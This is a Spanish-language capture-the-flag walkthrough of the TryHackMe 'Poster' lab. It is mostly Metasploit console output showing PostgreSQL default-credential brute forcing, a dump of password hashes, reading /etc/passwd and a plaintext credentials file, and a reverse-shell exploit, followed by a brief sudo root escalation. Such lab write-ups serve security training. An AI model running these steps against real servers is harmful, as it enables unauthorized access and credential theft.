This page looks best with JavaScript enabled

TryHackMe - Poster

 ·  ☕ 12 min read  ·  ✍️ sckull

Poster es una maquina de TryHackMe aqui encontrarás la solucion para obtener la flag user.txt y root.txt.

Informacion de la Maquina

Titulo Ghizer
Info The sys admin set up a rdbms in a safe way.
Puntos 760
Dificultad Facil
Maker stuxnet

NMAP

Escaneo de puertos tcp, nmap nos muestra el puerto http (80) y el puerto postgresql (5432) abiertos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
# Nmap 7.80 scan initiated Fri Sep 11 23:46:50 2020 as: nmap -Pn -p- --min-rate=1000 -o allports poster.thm
Warning: 10.10.111.10 giving up on port because retransmission cap hit (10).
Nmap scan report for poster.thm (10.10.111.10)
Host is up (0.26s latency).
Not shown: 63651 closed ports, 1882 filtered ports
PORT     STATE SERVICE
80/tcp   open  http
5432/tcp open  postgresql

# Nmap done at Fri Sep 11 23:49:38 2020 -- 1 IP address (1 host up) scanned in 168.04 seconds

# Nmap 7.80 scan initiated Fri Sep 11 23:51:06 2020 as: nmap -Pn -sV -sC -p80,5432 -o servicePorts poster.thm
Nmap scan report for poster.thm (10.10.111.10)
Host is up (0.34s latency).

PORT     STATE SERVICE    VERSION
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Poster CMS
5432/tcp open  postgresql PostgreSQL DB 9.5.8 - 9.5.10
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2020-07-29T00:54:25
|_Not valid after:  2030-07-27T00:54:25
|_ssl-date: TLS randomness does not represent time

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Sep 11 23:51:23 2020 -- 1 IP address (1 host up) scanned in 16.70 seconds

HTTP

Encontramos una pagina web en el puerto 80.
image

GOBUSTER

Utilizamos gobuster para busqueda de directorios y archivos.

1
2
3
4
5
kali@kali:~/thm/poster$ gobuster dir -u http://poster.thm/ -w /usr/share/wordlists/dirb/common.txt -q -t 25 -x php,html,txt
/assets (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/server-status (Status: 403)

POSTGRESQL - METASPLOIT

Utilizando un modulo de metasploit para la enumeracion de usuarios por default logramos encontrar unas credenciales. Hay que mencionar que el nombre de las bases de datos que postgres crea durante la instalacion son: postgres y template1, por lo que es posible utilizar uno de estos dos para realizar una enumeracion de credenciales.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
msf5 > search type:auxiliary postgres

Matching Modules
================

   #   Name                                                       Disclosure Date  Rank    Check  Description
   -   ----                                                       ---------------  ----    -----  -----------
   0   auxiliary/admin/http/manageengine_pmp_privesc              2014-11-08       normal  Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   1   auxiliary/admin/http/rails_devise_pass_reset               2013-01-28       normal  No     Ruby on Rails Devise Authentication Password Reset
   2   auxiliary/admin/postgres/postgres_readfile                                  normal  No     PostgreSQL Server Generic Query
   3   auxiliary/admin/postgres/postgres_sql                                       normal  No     PostgreSQL Server Generic Query
   4   auxiliary/analyze/crack_databases                                           normal  No     Password Cracker: Databases
   5   auxiliary/scanner/postgres/postgres_dbname_flag_injection                   normal  No     PostgreSQL Database Name Command Line Flag Injection
   6   auxiliary/scanner/postgres/postgres_hashdump                                normal  No     Postgres Password Hashdump
   7   auxiliary/scanner/postgres/postgres_login                                   normal  No     PostgreSQL Login Utility
   8   auxiliary/scanner/postgres/postgres_schemadump                              normal  No     Postgres Schema Dump
   9   auxiliary/scanner/postgres/postgres_version                                 normal  No     PostgreSQL Version Probe
   10  auxiliary/server/capture/postgresql                                         normal  No     Authentication Capture: PostgreSQL


msf5 > use auxiliary/scanner/postgres/postgres_login
msf5 auxiliary(scanner/postgres/postgres_login) > show options 

Module options (auxiliary/scanner/postgres/postgres_login):

   Name              Current Setting                                                               Required  Description
   ----              ---------------                                                               --------  -----------
   BLANK_PASSWORDS   false                                                                         no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                             yes       How fast to bruteforce, from 0 to 5
   DATABASE          template1                                                                     yes       The database to authenticate against
   DB_ALL_CREDS      false                                                                         no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                         no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                         no        Add all users in the current database to the list
   PASSWORD                                                                                        no        A specific password to authenticate with
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_pass.txt      no        File containing passwords, one per line
   Proxies                                                                                         no        A proxy chain of format type:host:port[,type:host:port][...]
   RETURN_ROWSET     true                                                                          no        Set to true to see query result sets
   RHOSTS                                                                                          yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT             5432                                                                          yes       The target port
   STOP_ON_SUCCESS   false                                                                         yes       Stop guessing when a credential works for a host
   THREADS           1                                                                             yes       The number of concurrent threads (max one per host)
   USERNAME                                                                                        no        A specific username to authenticate as
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists/postgres_default_userpass.txt  no        File containing (space-separated) users and passwords, one pair per line
   USER_AS_PASS      false                                                                         no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists/postgres_default_user.txt      no        File containing users, one per line
   VERBOSE           true                                                                          yes       Whether to print output for all attempts

msf5 auxiliary(scanner/postgres/postgres_login) > set rhosts poster.thm
rhosts => poster.thm
msf5 auxiliary(scanner/postgres/postgres_login) > run

[!] No active DB -- Credential data will not be saved!
[-] 10.10.111.10:5432 - LOGIN FAILED: :@template1 (Incorrect: Invalid username or password)

[... REDACTED ...]

[+] 10.10.111.10:5432 - Login Successful: [... REDACTED ...]

[... REDACTED ...]

[-] 10.10.111.10:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: Invalid username or password)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/postgres/postgres_login) >

Con las credenciales encontradas podemos verificar que el usuario actual pueda realizar Querys en la base de datos template1. El query que trae por defecto el modulo es para verificar la version de postgres.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
msf5 > use auxiliary/admin/postgres/postgres_sql
msf5 auxiliary(admin/postgres/postgres_sql) > show options 

Module options (auxiliary/admin/postgres/postgres_sql):

   Name           Current Setting   Required  Description
   ----           ---------------   --------  -----------
   DATABASE       template1         yes       The database to authenticate against
   PASSWORD       postgres          no        The password for the specified username. Leave blank for a random password.
   RETURN_ROWSET  true              no        Set to true to see query result sets
   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          5432              yes       The target port
   SQL            select version()  no        The SQL query to execute
   USERNAME       postgres          yes       The username to authenticate as
   VERBOSE        false             no        Enable verbose output

msf5 auxiliary(admin/postgres/postgres_sql) > set RHOSTS poster.thm
RHOSTS => poster.thm
msf5 auxiliary(admin/postgres/postgres_sql) > set PASSWORD [... REDACTED ...]
PASSWORD => [... REDACTED ...]
msf5 auxiliary(admin/postgres/postgres_sql) > show options 

Module options (auxiliary/admin/postgres/postgres_sql):

   Name           Current Setting    Required  Description
   ----           ---------------    --------  -----------
   DATABASE       template1          yes       The database to authenticate against
   PASSWORD       [... REDACTED ...]           no        The password for the specified username. Leave blank for a random password.
   RETURN_ROWSET  true               no        Set to true to see query result sets
   RHOSTS         poster.thm         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          5432               yes       The target port
   SQL            select version()  no        The SQL query to execute
   USERNAME       postgres           yes       The username to authenticate as
   VERBOSE        false              no        Enable verbose output

msf5 auxiliary(admin/postgres/postgres_sql) > run
[*] Running module against 10.10.111.10

Query Text: 'select version()'
===============================

    version
    -------
    PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit

[*] Auxiliary module execution completed
msf5 auxiliary(admin/postgres/postgres_sql) > 

Ahora que sabemos que podemos realizar querys en la base de datos, vamos a probar si es posible obtener los hashes de los usuarios con un modulo de metasploit.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
msf5 auxiliary(admin/postgres/postgres_sql) > use auxiliary/scanner/postgres/postgres_hashdump
msf5 auxiliary(scanner/postgres/postgres_hashdump) > show options 

Module options (auxiliary/scanner/postgres/postgres_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  postgres         yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5432             yes       The target port
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  postgres         yes       The username to authenticate as

msf5 auxiliary(scanner/postgres/postgres_hashdump) > set PASSWORD [... REDACTED ...]
PASSWORD => [... REDACTED ...]
msf5 auxiliary(scanner/postgres/postgres_hashdump) > set rhosts poster.thm
rhosts => poster.thm
msf5 auxiliary(scanner/postgres/postgres_hashdump) > show options 

Module options (auxiliary/scanner/postgres/postgres_hashdump):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  postgres         yes       The database to authenticate against
   PASSWORD  [... REDACTED ...]         no        The password for the specified username. Leave blank for a random password.
   RHOSTS    poster.thm       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5432             yes       The target port
   THREADS   1                yes       The number of concurrent threads (max one per host)
   USERNAME  postgres         yes       The username to authenticate as

msf5 auxiliary(scanner/postgres/postgres_hashdump) > run

[+] Query appears to have run successfully
[+] Postgres Server Hashes
======================

 Username   Hash
 --------   ----
 darkstart  md58842b99375db43e9fdf238753623a27d
 poster     md578fb805c7412ae597b399844a54cce0a
 postgres   md532e12f215ba27cb750c9e093ce4b5127
 sistemas   md5f7dbc0d5a06653e74da6b1af9290ee2b
 ti         md57af9ac4c593e9e4f275576e13f935579
 tryhackme  md503aab1165001c8f8ccae31a8824efddc

[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/postgres/postgres_hashdump) >

Tambien es posible realizar una lectura de archivos dentro del servidor utilizando otro modulo de metasploit. Al realizar la lectura del archivo /etc/passwd vemos la lista de usuarios dentro del servidor, además de eso tambien vemos una direccion de un archivo de texto.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
msf5 auxiliary(scanner/postgres/postgres_hashdump) > use auxiliary/admin/postgres/postgres_readfile
msf5 auxiliary(admin/postgres/postgres_readfile) > show options 

Module options (auxiliary/admin/postgres/postgres_readfile):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  postgres         no        The password for the specified username. Leave blank for a random password.
   RFILE     /etc/passwd      yes       The remote file
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

msf5 auxiliary(admin/postgres/postgres_readfile) > set rhosts poster.thm
rhosts => poster.thm
msf5 auxiliary(admin/postgres/postgres_readfile) > set PASSWORD [... REDACTED ...]
PASSWORD => [... REDACTED ...]
msf5 auxiliary(admin/postgres/postgres_readfile) > show options 

Module options (auxiliary/admin/postgres/postgres_readfile):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DATABASE  template1        yes       The database to authenticate against
   PASSWORD  [... REDACTED ...]         no        The password for the specified username. Leave blank for a random password.
   RFILE     /etc/passwd      yes       The remote file
   RHOSTS    poster.thm       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     5432             yes       The target port
   USERNAME  postgres         yes       The username to authenticate as
   VERBOSE   false            no        Enable verbose output

msf5 auxiliary(admin/postgres/postgres_readfile) > run
[*] Running module against 10.10.111.10

Query Text: 'CREATE TEMP TABLE FEtNusWQceZc (INPUT TEXT);
      COPY FEtNusWQceZc FROM '/etc/passwd';
      SELECT * FROM FEtNusWQceZc'
=======================================================================================================================================

    input
    -----
    #/home/dark/credentials.txt
    _apt❌105:65534::/nonexistent:/bin/false
    alison❌1000:1000:Poster,,,:/home/alison:/bin/bash
    backup❌34:34:backup:/var/backups:/usr/sbin/nologin
    bin❌2:2:bin:/bin:/usr/sbin/nologin
    daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
    dark❌1001:1001::/home/dark:
    games❌5:60:games:/usr/games:/usr/sbin/nologin
    gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail❌8:8:mail:/var/mail:/usr/sbin/nologin
    man❌6:12:man:/var/cache/man:/usr/sbin/nologin
    messagebus❌106:110::/var/run/dbus:/bin/false
    news❌9:9:news:/var/spool/news:/usr/sbin/nologin
    nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    postgres❌109:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    proxy❌13:13:proxy:/bin:/usr/sbin/nologin
    root❌0:0:root:/root:/bin/bash
    sshd❌108:65534::/var/run/sshd:/usr/sbin/nologin
    sync❌4:65534:sync:/bin:/bin/sync
    sys❌3:3:sys:/dev:/usr/sbin/nologin
    syslog❌104:108::/home/syslog:/bin/false
    systemd-bus-proxy❌103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
    systemd-network❌101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
    systemd-resolve❌102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
    systemd-timesync❌100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
    uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    uuidd❌107:111::/run/uuidd:/bin/false
    www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
[+] 10.10.111.10:5432 Postgres - /etc/passwd saved in /home/kali/.msf4/loot/20200912002939_default_10.10.111.10_postgres.file_993710.txt
[*] Auxiliary module execution completed
msf5 auxiliary(admin/postgres/postgres_readfile) >

Realizamos la lectura de este archivo sospechoso y vemos que son “credenciales” de uno de los usuarios del servidor.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
msf5 auxiliary(admin/postgres/postgres_readfile) > set RFILE /home/dark/credentials.txt
RFILE => /home/dark/credentials.txt
msf5 auxiliary(admin/postgres/postgres_readfile) > run
[*] Running module against 10.10.111.10

Query Text: 'CREATE TEMP TABLE bqGyoC (INPUT TEXT);
      COPY bqGyoC FROM '/home/dark/credentials.txt';
      SELECT * FROM bqGyoC'
====================================================================================================================================

    input
    -----
    dark:[... REDACTED ...]

dark:qwerty1234#!hackme
[+] 10.10.111.10:5432 Postgres - /home/dark/credentials.txt saved in /home/kali/.msf4/loot/20200912003043_default_10.10.111.10_postgres.file_281669.txt
[*] Auxiliary module execution completed
msf5 auxiliary(admin/postgres/postgres_readfile) >

Tambien existe un modulo con el cual podemos realizar una ejecucion de comandos utilizando las credenciales de un usuario de postgres.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) >  
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set PASSWORD [... REDACTED ...]
PASSWORD => [... REDACTED ...]
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set rhosts poster.thm
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LHOST tun0
LHOST => 10.10.10.10
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > set LPORT 1338
LPORT => 1338
msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > show options 

Module options (exploit/multi/postgres/postgres_copy_from_program_cmd_exec):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   DATABASE           template1        yes       The database to authenticate against
   DUMP_TABLE_OUTPUT  false            no        select payload command output from table (For Debugging)
   PASSWORD           [... REDACTED ...]         no        The password for the specified username. Leave blank for a random password.
   RHOSTS             poster.thm       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT              5432             yes       The target port (TCP)
   TABLENAME          kkskRfiV8Yxo     yes       A table name that does not exist (To avoid deletion)
   USERNAME           postgres         yes       The username to authenticate as


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.10.10      yes       The listen address (an interface may be specified)
   LPORT  1338             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(multi/postgres/postgres_copy_from_program_cmd_exec) > run

[*] Started reverse TCP handler on 10.10.10.10:1338 
[*] 10.10.111.10:5432 - 10.10.111.10:5432 - PostgreSQL 9.5.21 on x86_64-pc-linux-gnu, compiled by gcc (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609, 64-bit
[*] 10.10.111.10:5432 - Exploiting...
[+] 10.10.111.10:5432 - 10.10.111.10:5432 - kkskRfiV8Yxo dropped successfully
[+] 10.10.111.10:5432 - 10.10.111.10:5432 - kkskRfiV8Yxo created successfully
[+] 10.10.111.10:5432 - 10.10.111.10:5432 - kkskRfiV8Yxo copied successfully(valid syntax/command)
[*] Command shell session 1 opened (10.10.10.10:1338 -> 10.10.111.10:57476) at 2020-09-12 00:40:40 -0400
[+] 10.10.111.10:5432 - 10.10.111.10:5432 - kkskRfiV8Yxo dropped successfully(Cleaned)
[*] 10.10.111.10:5432 - Exploit Succeeded

id
uid=109(postgres) gid=117(postgres) groups=117(postgres),116(ssl-cert)
whoami
postgres
pwd
/var/lib/postgresql/9.5/main

DARK - USER

Utilizamos las credenciales en el servicio ssh y logramos obtener una shell.

image

ALISON - USER

Realizamos una enumeracion en la maquina ya que la flag user.txt se encuentra en la carpeta de la usuario Alison en la que no tenemos acceso. En un archivo de configuracion de la pagina web que esta corriendo en el puerto 80 encontramos unas credenciales que podrian pertencer a Alison. Utilizamos estas credenciales, logramos obtener una shell con Alison y nuestra flag user.txt.

image

PRIVILEGE ESCALATION

Hacemos una pequeña enumeracion con sudo -l -l y vemos que tenemos permisos root (sudo) para cualquier comando. Utilizamos sudo su para obtener una shell con usuario root y nuestra flag root.txt.

image

Share on

sckull
WRITTEN BY
sckull
Pentester wannabe

THM: Poster